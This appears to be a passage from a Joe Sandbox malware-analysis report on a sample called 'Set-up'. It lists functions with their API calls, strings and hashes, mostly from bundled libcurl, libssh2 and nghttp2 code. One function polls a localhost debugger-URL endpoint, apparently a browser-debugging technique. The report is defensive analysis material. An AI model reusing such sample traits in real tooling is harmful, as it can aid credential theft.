memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00044749
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 000448E5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0004491B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044963
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00044971
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0004497B

Part of subcall function 000406F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00045663,?), ref: 000406F9

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044A41
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00044A63
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044A6D
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00044AE0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044AEA
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00044B28
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044B34
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00044B76
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044B80

Strings

urlapi.c, xrefs: 000447B9, 000447CC, 000447E2, 0004482C, 00044856, 00044879, 000449A6
%ld, xrefs: 000449BC
%u.%u.%u.%u, xrefs: 00044C00

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _errno$strtoul$strchr$memchrstrlen
String ID: %ld$%u.%u.%u.%u$urlapi.c
API String ID: 102816355-2423153182
Opcode ID: c14125c09e728a25e0d50889bc0adab357c1b31baed40cfe827eb8f1f3509fb6
Instruction ID: 87fd42e8dc969837f6ec6201d3ed64c72d1fa45346355bb1fd6099d55202e443
Opcode Fuzzy Hash: c14125c09e728a25e0d50889bc0adab357c1b31baed40cfe827eb8f1f3509fb6
Instruction Fuzzy Hash: 56D124F19082116BEB20AB24EC42B7F7BD59F52314F054538F8899B283FB74DD5487AA

Function 000663E0 Relevance: 31.8, APIs: 8, Strings: 13, Instructions: 330stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000686F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000003), ref: 00068704

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00066460
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00066472
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00066487
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0006649C
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00066654
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00066666
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 0006667B

Strings

default, xrefs: 000664C1, 00066564, 00066697
dict.c, xrefs: 00066706, 00066719
/DEFINE:, xrefs: 00066607
Failed sending DICT request, xrefs: 000665D1, 000666F4, 0006678C
CLIENT libcurl 8.10.1DEFINE %s %sQUIT, xrefs: 000666E0
/M:, xrefs: 0006642A
CLIENT libcurl 8.10.1MATCH %s %s %sQUIT, xrefs: 000665B9
/MATCH:, xrefs: 00066413
/FIND:, xrefs: 00066441
CLIENT libcurl 8.10.1%sQUIT, xrefs: 00066778
lookup word is missing, xrefs: 000664DF, 000666B5
/LOOKUP:, xrefs: 00066635
/D:, xrefs: 0006661E

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strchr$strlen
String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 8.10.1%sQUIT$CLIENT libcurl 8.10.1DEFINE %s %sQUIT$CLIENT libcurl 8.10.1MATCH %s %s %sQUIT$Failed sending DICT request$default$dict.c$lookup word is missing
API String ID: 842768466-2079990832
Opcode ID: e5e686e918b9be77916df5d7cce2c88aedcee30a3456270dc64f3a3b681c6b24
Instruction ID: 76f7e3232e33a595c00a2bfa020f23240b1255a937701630e5bcdbb83a8c22a2
Opcode Fuzzy Hash: e5e686e918b9be77916df5d7cce2c88aedcee30a3456270dc64f3a3b681c6b24
Instruction Fuzzy Hash: 90A11B61E043416AE7722634AD13B7A7ACA9F62748F0C4174FD869A1D3FE73DD50C262

Function 0010C700 Relevance: 30.2, APIs: 6, Strings: 11, Instructions: 478COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0010C719
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0010C7C9
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0010CB6F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(005E37F8,sftp.c,000006F4), ref: 0010CD6E
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left,sftp.c,000005EE), ref: 0010CD83
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->eof,sftp.c,000005EF), ref: 0010CD98

Strings

sftp.c, xrefs: 0010CD64, 0010CD79, 0010CD8E
Read Packet At Unexpected Offset, xrefs: 0010CCBD
rc != LIBSSH2_ERROR_EAGAIN || !filep->eof, xrefs: 0010CD93
SFTP Protocol badness: unrecognised read request response, xrefs: 0010CCB3
SFTP READ error, xrefs: 0010CCFF
FXP_READ response too big, xrefs: 0010CCCE
SFTP Protocol badness, xrefs: 0010CCC7
gesftp_read() internal error, xrefs: 0010CA72
rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left, xrefs: 0010CD7E
malloc fail for FXP_WRITE, xrefs: 0010CCDB
Response too small, xrefs: 0010CC86

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert$memcpy$_time64
String ID: FXP_READ response too big$Read Packet At Unexpected Offset$Response too small$SFTP Protocol badness$SFTP Protocol badness: unrecognised read request response$SFTP READ error$gesftp_read() internal error$malloc fail for FXP_WRITE$rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left$rc != LIBSSH2_ERROR_EAGAIN || !filep->eof$sftp.c
API String ID: 2498518694-199359813
Opcode ID: 5d4b898a5fab8a36fd80daf08e38cff25c1c2f7af70b58ab4248a063f35a2c4f
Instruction ID: 42ad18c420b5c5dac2cbc930b79580d4409a73cbe82b80a3cbf16f340b1404bf
Opcode Fuzzy Hash: 5d4b898a5fab8a36fd80daf08e38cff25c1c2f7af70b58ab4248a063f35a2c4f
Instruction Fuzzy Hash: 9F02A0B19043049FC714DF24D885B9ABBE4BF98354F154A29F9CA97292E7B0E904CFD2

Function 0009C350 Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 166stringnetworkCOMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 0009C37A
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 0009C476
WSAGetLastError.WS2_32 ref: 0009C4AE

Strings

erro, xrefs: 0009C568
QUIC connect: %s in connection to %s:%d (%s), xrefs: 0009C525
SSL certificate verification failed, xrefs: 0009C582
SSL_ERROR unknown, xrefs: 0009C502, 0009C524
No error, xrefs: 0009C463
Unkn, xrefs: 0009C578
SSL certificate problem: %s, xrefs: 0009C420
unknown, xrefs: 0009C374
r, xrefs: 0009C561
SSL_ERROR_SYSCALL, xrefs: 0009C4F5
Unknown error, xrefs: 0009C468, 0009C474
QUIC connection has been shut down, xrefs: 0009C3D1
own , xrefs: 0009C570

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: ErrorLastmemcpystrcpy
String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
API String ID: 31095072-3036451936
Opcode ID: 86ca4c0f16ef2c88a143ca61d90109de5812a37d1e0ac20cc621b3a467546e3f
Instruction ID: ea3fbf36f3bbac135fa02e7ea1c9857af6d4eb4774b778b291c7351fc425a5d9
Opcode Fuzzy Hash: 86ca4c0f16ef2c88a143ca61d90109de5812a37d1e0ac20cc621b3a467546e3f
Instruction Fuzzy Hash: 61511871D083409FEB209B549C41FAFBBD4EF91304F158429F9889B293E675E984DB92

Function 0006A33B Relevance: 27.4, APIs: 1, Strings: 17, Instructions: 425stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0006A33C

Strings

Exceeded storage allocation, xrefs: 0006A8C4
ABOR, xrefs: 0006A83B
*, xrefs: 0006A6D4
Uploaded unaligned file size (%lld out of %lld bytes), xrefs: 0006A5B2
QUOT string not accepted: %s, xrefs: 0006A6E9
Remembering we are in dir "%s", xrefs: 0006A7E9
, xrefs: 0006A7CF
???, xrefs: 0006A34D, 0006A352, 0006A76F, 0006A777
server did not report OK, got %d, xrefs: 0006A937
Failure sending ABOR command: %s, xrefs: 0006A866
[%s] closing DATA connection, xrefs: 0006A353
[%s] done, result=%d, xrefs: 0006A778
ftp.c, xrefs: 0006A5D9, 0006A786
partial download completed, closing connection, xrefs: 0006A912
Received only partial file: %lld bytes, xrefs: 0006A604
control connection looks dead, xrefs: 0006A567
No data was received, xrefs: 0006A45B

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen
String ID: $*$???$ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$QUOT string not accepted: %s$Received only partial file: %lld bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%lld out of %lld bytes)$[%s] closing DATA connection$[%s] done, result=%d$control connection looks dead$ftp.c$partial download completed, closing connection$server did not report OK, got %d
API String ID: 39653677-2752486839
Opcode ID: bdfea3c9c8c8be74273295f0394a04b0f60139ede32402f6c85012a9b0e429c0
Instruction ID: bec3169a14c0c1278ea766639aa0f12600d91d89ad0e9582bd9744b2e2ceb24d
Opcode Fuzzy Hash: bdfea3c9c8c8be74273295f0394a04b0f60139ede32402f6c85012a9b0e429c0
Instruction Fuzzy Hash: 52F191757083019FD750AF24C885B6ABBE6AF96704F088578F888AB243D775E944CF52

Function 00074830 Relevance: 25.8, APIs: 1, Strings: 16, Instructions: 267stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00074AE0

Part of subcall function 00026C30: strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000003F), ref: 00026CF3

Strings

Proxy-, xrefs: 00074B43
AWS_SIGV4, xrefs: 000748B0
%s auth using %s with user '%s', xrefs: 00074A54
Bearer, xrefs: 000749F3
Digest, xrefs: 00074879
Server, xrefs: 00074A2C, 00074A53
Basic, xrefs: 00074B98
,, xrefs: 00074A86
%sAuthorization: Basic %s, xrefs: 00074B59
%s:%s, xrefs: 00074ACC
Proxy, xrefs: 00074A27
Authorization, xrefs: 00074974, 000749AA
NTLM, xrefs: 0007495E, 00074A52
Proxy-authorization, xrefs: 0007491D
http.c, xrefs: 000749C0, 00074AFE, 00074B2A, 00074B69, 00074B85
Authorization: Bearer %s, xrefs: 000749DE

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strchrstrlen
String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$,$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Proxy$Proxy-$Proxy-authorization$Server$http.c
API String ID: 986617436-2322216787
Opcode ID: 9e455aa9952d10d534072290b5cde7f851d8a246fb663089b85369462aa79dd8
Instruction ID: 24fead604df931cf6fa59f7306252c5612fab80a2963a816d49e30b3d1f77bfa
Opcode Fuzzy Hash: 9e455aa9952d10d534072290b5cde7f851d8a246fb663089b85369462aa79dd8
Instruction Fuzzy Hash: A4910170E443146BEB715A249841B7F7AD4AF85314F08843DFD9D8B282EB78DD04CB6A

Function 000B23C0 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 277COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp2_buf_avail(buf) >= datamax,nghttp2_session.c,00001E56), ref: 000B25EA
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(bufs->head == bufs->cur,nghttp2_session.c,00001E22,FFFFFE38,00000000), ref: 000B26C7
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(005B3768,nghttp2_session.c,00001E67), ref: 000B26DC
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(&session->aob.framebufs == bufs,nghttp2_session.c,00001E4D), ref: 000B26F1
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS,nghttp2_session.c,00000438), ref: 000B2706
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_session.c,00000446), ref: 000B271B

Strings

0 == rv, xrefs: 000B2716
&session->aob.framebufs == bufs, xrefs: 000B26EC
nghttp2_session.c, xrefs: 000B25E0, 000B26BD, 000B26D2, 000B26E7, 000B26FC, 000B2711
nghttp2_buf_avail(buf) >= datamax, xrefs: 000B25E5
bufs->head == bufs->cur, xrefs: 000B26C2
urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS, xrefs: 000B2701

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: &session->aob.framebufs == bufs$0 == rv$bufs->head == bufs->cur$nghttp2_buf_avail(buf) >= datamax$nghttp2_session.c$urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS
API String ID: 1222420520-4202471155
Opcode ID: b4496038c9d3962a10ba803652ea42864e942843e5cea7aa005928a6396b0119
Instruction ID: c8841e9f999945dcaca27477b85cc5702270346efd0a63440c0d3824f254e6fd
Opcode Fuzzy Hash: b4496038c9d3962a10ba803652ea42864e942843e5cea7aa005928a6396b0119
Instruction Fuzzy Hash: 59A1DF712047019FDB14DF24C885BEABBE2BF88304F18856CF8898B6A2D771ED41CB91

Function 000825D0 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 295COMMON

Download Yara Rule

Strings

STARTTLS, xrefs: 00082D47
L-IR, xrefs: 0008289C
STAR, xrefs: 0008283C
STARTTLS not available., xrefs: 00083094
STARTTLS denied, xrefs: 00083068
LOGINDISABLED, xrefs: 00082867
Got unexpected imap-server response, xrefs: 00083034
AUTH, xrefs: 000828C5
PREAUTH connection, already authenticated, xrefs: 00082770
CAPABILITY, xrefs: 00082797
TTLS, xrefs: 00082846
SASL, xrefs: 00082892

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
API String ID: 0-3171374047
Opcode ID: c8c4a97bf61283e8b6ddc57b2c17329580b8ed26ee07b61a8d77155a2bc4eafe
Instruction ID: 6361c85b9925ad62b6d12ab9278dfe431cbf836f36e3aaeeeb0c958f5c6a46dd
Opcode Fuzzy Hash: c8c4a97bf61283e8b6ddc57b2c17329580b8ed26ee07b61a8d77155a2bc4eafe
Instruction Fuzzy Hash: FFB19E71A083019BDB61BB24C8917BE77E4BF92B04F180139E8D957283EB35DE84D792

Function 000220AD Relevance: 19.6, APIs: 3, Strings: 10, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000220D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000222D0

Strings

All %d attempts to fetch debugger URL failed., xrefs: 000222EF
Failed to initialize curl., xrefs: 0002213F
@, xrefs: 000221F2
Attempt %d failed: %s, xrefs: 0002229F
Failed to allocate memory for response., xrefs: 000220F1
+N, xrefs: 000221B1
Q, xrefs: 00022213
GET request succeeded on attempt %d., xrefs: 0002225D
d, xrefs: 00022178
http://localhost:%d/json, xrefs: 00022170

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: freemalloc
String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
API String ID: 3061335427-1249806554
Opcode ID: 22cdefba3eba288bb239e41d48d40c4284e4959faed874be68ebc4e4663eea8a
Instruction ID: d3f680fda509197c9f4a2bd808bf125d0f68cb57359486ea03c097df9b6666ce
Opcode Fuzzy Hash: 22cdefba3eba288bb239e41d48d40c4284e4959faed874be68ebc4e4663eea8a
Instruction Fuzzy Hash: B86186B0909715EFDB00EFA8D48579EBBF0BF44314F11891DE588A7342D77999848F92

Function 000761C0 Relevance: 18.2, APIs: 4, Strings: 8, Instructions: 234stringCOMMON

Download Yara Rule

APIs

